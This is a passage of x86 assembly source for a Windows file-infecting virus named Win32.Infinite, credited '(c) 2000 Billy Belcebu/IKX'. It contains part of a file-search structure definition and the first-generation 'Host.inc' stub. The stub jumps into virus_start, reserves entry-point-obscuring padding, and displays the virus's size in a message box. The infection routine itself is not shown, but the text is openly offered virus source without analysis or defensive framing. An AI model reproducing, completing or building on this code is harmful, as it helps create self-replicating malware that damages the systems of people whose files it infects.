ftCreationTime          dq      ?
ftLastAccessTime        dq      ?
ftLastWriteTime         dq      ?
nFileSizeHigh           dd      ?
nFileSizeLow            dd      ?
dwReserved0             dd      ?
dwReserved1             dd      ?
szFileName              db      260 dup (?)
szAlternateFileName     db      13 dup (?)
                        db      03 dup (?)
WIN32_FIND_DATA ends
;-------------------------------- [Host.inc] --------------------------------;
;****************************************************************************
;** This is the host for the first generation                              **
;****************************************************************************

        .586p
        .model  flat,stdcall

        extrn   MessageBoxA:proc
        extrn   ExitProcess:proc

_DATA   segment dword use32 public 'DATA'

szTtl   db      "Win32.Infinite",0
szMsg   db      "Size"
        db      virus_size/1000 mod 10+"0"
        db      virus_size/0100 mod 10+"0"
        db      virus_size/0010 mod 10+"0"
        db      virus_size/0001 mod 10+"0"
        db      "-"
        db      "Virtual"
        db      total_size/1000 mod 10+"0"
        db      total_size/0100 mod 10+"0"
        db      total_size/0010 mod 10+"0"
        db      total_size/0001 mod 10+"0"
        db      10,"(c) 2000 Billy Belcebu/IKX",0

_DATA   ends

_TEXT   segment dword use32 public 'CODE'

virus_init proc
        jmp     virus_start
host:
        db      epo_bytes dup (90h)
        call    MessageBoxA,0,offset szMsg,offset szTtl,0
        call    ExitProcess,0
virus_init endp

_TEXT   ends